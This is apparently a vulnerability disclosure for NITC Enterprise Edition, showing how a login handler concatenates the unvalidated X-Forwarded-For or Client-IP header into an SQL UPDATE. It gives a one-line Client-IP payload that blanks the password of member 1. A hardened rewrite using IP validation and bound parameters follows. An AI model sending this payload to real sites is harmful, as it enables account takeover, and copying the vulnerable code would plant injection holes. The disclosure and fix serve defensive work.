NITC Enterprise Edition SQL injection allows resetting any user's password

Vulnerability author: 路人甲

 

function getip( )
{
    // Vulnerable as shipped: header values are returned verbatim, with no validation.
    if ( isset( $_SERVER ) )
    {
        if ( isset( $_SERVER['HTTP_X_FORWARDED_FOR'] ) )
        {
            $realip = $_SERVER['HTTP_X_FORWARDED_FOR'];
            return $realip;
        }
        if ( isset( $_SERVER['HTTP_CLIENT_IP'] ) )
        {
            $realip = $_SERVER['HTTP_CLIENT_IP'];
            return $realip;
        }
        $realip = $_SERVER['REMOTE_ADDR'];
        return $realip;
    }
    if ( getenv( "HTTP_X_FORWARDED_FOR" ) )
    {
        $realip = getenv( "HTTP_X_FORWARDED_FOR" );
        return $realip;
    }
    if ( getenv( "HTTP_CLIENT_IP" ) )
    {
        $realip = getenv( "HTTP_CLIENT_IP" );
        return $realip;
    }
    $realip = getenv( "REMOTE_ADDR" );
    return $realip;
}

The IP value is taken from client-controlled headers (X-Forwarded-For, Client-IP) without any filtering, and it is later concatenated into SQL, so the site is injectable in every place that stores the IP.

if ( $action == "login" )
{
    ....
    $ip = getip( );
    $_SESSION['member_email'] = $email;
    $_SESSION['member_id'] = $result['member_id'];
    $_SESSION['state'] = $result['state'];
    $_SESSION['member_name'] = $result['name'];
    // $ip goes straight into the UPDATE string
    $site->table( "member" )( "update ".$site->table( "member" ).( " set last_ip='".$ip."',last_time='" ).date( "Y-m-d H:i:s", time( ) )."' where member_id=".$result['member_id'] );
}

Here, when a user logs in, the login IP is recorded with an UPDATE on the member table. Because the injection point sits inside an UPDATE of user data, it can be used directly to overwrite any user's password.

Proof of vulnerability:

PoC: add the following request header: client-ip:',password='' where member_id=1#
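As an added hardening example (my code, not NITC's), the same IP lookup and UPDATE rewritten so that the header value must parse as an IP literal, proxy headers are only honoured from a known proxy, and the IP is bound as a parameter; the $pdo connection, the trusted proxy address and the unprefixed table name are assumptions:

```php
<?php
// Added example, not NITC code. Assumes a PDO connection in $pdo and that the
// table prefix applied by $site->table("member") is already in the name "member".

// Return the client IP. Proxy headers are trusted only when REMOTE_ADDR is one
// of our own proxies; every candidate must validate as an IP literal, so a
// value such as "',password='' where member_id=1#" is discarded.
function getip_safe(array $server, array $trustedProxies = []): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (in_array($remote, $trustedProxies, true)) {
        foreach (['HTTP_X_FORWARDED_FOR', 'HTTP_CLIENT_IP'] as $header) {
            if (!isset($server[$header])) {
                continue;
            }
            // X-Forwarded-For may be a comma-separated chain; take the first hop.
            $candidate = trim(explode(',', $server[$header])[0]);
            if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
                return $candidate;
            }
        }
    }
    // REMOTE_ADDR comes from the TCP connection, not from a header the client sets.
    return filter_var($remote, FILTER_VALIDATE_IP) !== false ? $remote : '0.0.0.0';
}

// Record the login with bound parameters: the IP travels as data, never as SQL
// text, so the WHERE clause cannot be rewritten by a crafted header even if
// validation were bypassed.
function record_login(PDO $pdo, int $memberId, string $ip): void
{
    $stmt = $pdo->prepare(
        'UPDATE member SET last_ip = :ip, last_time = :ts WHERE member_id = :id'
    );
    $stmt->execute([
        ':ip' => $ip,
        ':ts' => date('Y-m-d H:i:s'),
        ':id' => $memberId,
    ]);
}

// In the login handler (10.0.0.5 is a constructed reverse-proxy address):
// $ip = getip_safe($_SERVER, ['10.0.0.5']);
// record_login($pdo, (int) $result['member_id'], $ip);
```

With no trusted proxy configured, getip_safe() ignores X-Forwarded-For and Client-IP entirely and only ever returns REMOTE_ADDR.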
